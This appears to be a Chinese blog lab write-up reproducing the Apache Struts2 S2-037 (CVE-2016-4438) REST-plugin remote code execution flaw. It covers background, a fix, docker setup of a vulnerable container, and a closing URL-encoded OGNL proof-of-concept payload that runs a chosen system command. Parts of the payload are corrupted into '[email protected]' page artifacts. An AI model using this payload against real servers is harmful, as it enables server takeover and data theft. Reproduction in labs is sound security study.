【vulapps】Sturcts2 S2-037RCE漏洞复现

一、漏洞基本信息

 

S2-037官方公告

CVE编号：CVE-2016-4438
漏洞名称：Struts(S2-037)远程代码执行
漏洞发布日期：2016.615
受影响的软件及系统：Apache struts  2.3.20  -  2.3.28.1 版本使用了REST插件的用户

漏洞概述：Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下，攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438，目前命名为S2-037。,黑客可以利用漏洞直接执行任意代码，绕过文件限制，上传文件，执行远程命令，控制服务器，直接盗取用户的所有资料，该漏洞广泛影响所有struts版本。

rest介绍：
      使用http://localhost:8080/bee/action-name/1/XXX这种请求方式，其实XXX可以是任何合法的名字
      Struts2会查找XXX为名字的方法来调用，比如请求http://localhost:8080/bee/test/1/abc，那么TestAction的public String abc()就会被调用

攻击者可以使用REST插件调用恶意表达式实现远程执行代码。

漏洞修复&解决方案：升级到 Structs 2.3.29

 

二、漏洞环境搭建&测试

　　2.1 docker拉取镜像到本地

docker pull medicean/vulapps:s_struts2_s2-037

　　2.2 启动环境

docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037

　　2.3 访问http://ip:80

 

 

　　POC：command处输入想要执行的命令，这里举例为id

(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=id